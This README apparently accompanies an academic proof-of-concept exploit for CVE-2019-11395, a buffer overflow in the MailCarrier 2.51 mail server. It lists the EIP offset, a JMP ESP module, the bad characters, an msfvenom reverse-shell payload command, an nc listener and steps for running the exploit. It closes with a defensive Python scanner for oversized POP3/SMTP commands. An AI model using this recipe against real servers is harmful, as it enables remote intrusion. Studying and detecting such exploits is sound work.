CVE-2019-11395 describes a buffer overflow in the MailCarrier 2.51 email server that allows remote code execution. The overflow can be triggered through the SMTP `RCPT TO` command or the POP3 `USER`, `LIST`, `TOP` and `RETR` commands.
For an academic study, the POP3 handlers were chosen to build a Proof of Concept (PoC). Sending 6000 bytes to the application crashes it, which confirms the buffer overflow.
- Used `msf-pattern_create -l 6000` to generate a unique pattern and accurately identify the EIP overwrite.
- Identified the EIP offset with `msf-pattern_offset -q 6E47386E -l 6000`, resulting in an EIP offset of 5095.
- Identified `expsrv.dll`, a module with ASLR disabled, as suitable for a `JMP ESP`.
- Identified the bad characters `\x00\x0a\x0d` during the bad-character tests.
- Generated the payload with `msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 exitfunc=thread -f python -b "\x00\x0a\x0d" -v shellcode`.
- Adjusted the `CVE-2019-11395.py` code to accommodate the payload.
- Opened a listener with `nc -lnvp 4444` and executed the exploit (`CVE-2019-11395.py`) to gain access to the environment and validate the described CVE.
Follow these steps to use the exploit:
- Generate the payload with `msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 exitfunc=thread -f python -b "\x00\x0a\x0d" -v shellcode`.
- Copy the output of the `msfvenom` command.
- Edit `CVE-2019-11395.py` and replace the `shellcode` variable with the output obtained from the `msfvenom` command.
- Execute the exploit (`CVE-2019-11395.py`) to gain access to the environment and validate the described CVE.
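From the defender's side, the affected commands are easy to watch for: a legitimate `USER` or `RCPT TO` line never approaches the 6000 bytes described above. The following Python is an added example, not code from this repository, that scans captured POP3/SMTP client command lines and flags oversized or binary arguments to the verbs the advisory names; the per-protocol line limits (taken from RFC 1939 and RFC 5321) and the sample capture are assumptions constructed for the demonstration.

```python
import string
from dataclasses import dataclass
from typing import Iterable, Optional

# Verbs the advisory names as overflow-prone in MailCarrier 2.51.
WATCHED = {"POP3": {"USER", "LIST", "TOP", "RETR"}, "SMTP": {"RCPT"}}
# Maximum command-line length (with CRLF) each protocol allows; assumed from
# RFC 1939 (POP3) and RFC 5321 (SMTP). A longer line is malformed by definition.
MAX_LINE = {"POP3": 255, "SMTP": 512}
PRINTABLE = set(string.printable.encode()) - set(b"\x0b\x0c")

@dataclass
class Finding:
    proto: str
    verb: str
    length: int
    reason: str

def inspect_line(proto: str, line: bytes) -> Optional[Finding]:
    """Flag one client command line if it looks like an overflow attempt."""
    verb = line.split(b" ", 1)[0].rstrip(b"\r\n").upper().decode("ascii", "replace")
    if verb not in WATCHED[proto]:
        return None  # only the verbs the bug affects are checked here
    if len(line) > MAX_LINE[proto]:
        return Finding(proto, verb, len(line), f"line exceeds {MAX_LINE[proto]}-byte limit")
    if any(b not in PRINTABLE for b in line):
        return Finding(proto, verb, len(line), "non-printable bytes in command argument")
    return None

def scan_capture(commands: Iterable[tuple[str, bytes]]) -> list[Finding]:
    """Run inspect_line over (protocol, raw line) pairs and keep the hits."""
    return [f for proto, line in commands if (f := inspect_line(proto, line)) is not None]

# Constructed sample capture: benign traffic plus one POP3 USER line carrying the
# 6000-byte argument the write-up says crashes the service, and one binary RCPT.
SAMPLE = [
    ("POP3", b"USER alice\r\n"),
    ("POP3", b"RETR 1\r\n"),
    ("SMTP", b"RCPT TO:<bob@example.com>\r\n"),
    ("POP3", b"USER " + b"A" * 6000 + b"\r\n"),
    ("SMTP", b"RCPT TO:<" + b"\xff" * 20 + b">\r\n"),
]

if __name__ == "__main__":
    for f in scan_capture(SAMPLE):
        print(f"{f.proto} {f.verb}: {f.length} bytes, {f.reason}")
```

The same check can be applied as a pre-filter in a proxy in front of the server, since enforcing the RFC line limit alone defeats the 5095-byte overwrite described above.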